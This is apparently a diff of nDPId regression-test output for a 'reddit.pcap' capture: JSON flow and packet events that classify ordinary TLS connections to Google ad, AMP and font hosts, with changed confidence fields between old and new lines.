+00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9319,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690956,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690956,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9320,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690956,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690956,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9321,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1605291690957,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690957,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQan0Owi4YaAsmoBJXgA33AAACBAV4AQMDAwQCCArC10u\/uJU7NA=="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9322,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1605291690957,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690957,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQaPhCx3meEC1CoBJXgOW1AAACBAV4AQMDAwQCCArC10u+uJU7NA=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9323,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1605291690957,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690957,"pkt":"qtsDr8lk5EKm5WPyht1gCQMiACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGoBuxhoCyZ9DsIvgBAB+5HpAAABAQgKuJU7U8LXS78="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9324,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1605291690957,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690957,"pkt":"qtsDr8lk5EKm5WPyht1gB5miACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGgBu54QLUL4Qsd6gBAB+2moAAABAQgKuJU7U8LXS74="} -00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9325,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690957,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9326,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690957,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9344,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690990,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690990,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9325,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690957,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9326,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690957,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9344,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690990,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690990,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9357,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690992,"flow_last_seen":1605291690992,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690992,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36972,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9357,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1605291690992,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690992,"pkt":"qtsDr8lk5EKm5WPyht1gDPazACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGwBu4uuzGcAAAAAoAL9IIFCAAACBAWgBAIICriVO3YAAAAAAQMDBw=="} -00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9359,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690994,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690994,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9373,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690996,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690996,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9391,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690998,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690998,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9406,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690999,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01005{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9417,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690999,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fonts.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9427,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691002,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9434,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691003,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691003,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9436,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691003,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691003,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9446,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691004,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691004,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9359,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690994,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690994,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9373,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690996,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690996,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9391,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690998,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690998,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9406,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690999,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01005{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9417,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690999,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fonts.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9427,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691002,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 